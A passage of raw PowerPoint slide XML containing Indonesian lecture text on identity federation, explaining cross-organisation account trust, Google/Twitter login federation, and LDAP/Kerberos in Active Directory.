              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain, yang masing-masing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> KDC).</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84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11668201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Federasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Federasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekadar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdefinisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mitra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Perusahaan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Federasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempercayai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dunia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Google Workspace dan Twitter. Jika Google dan Twitter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>federasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Twitter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> LDAP dan Kerberos, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Windows Active Directory, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipusatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Saat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>federasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hadir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>batasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>interoperabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Kerberos, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>federasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Active Directory/LDAP. Desain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
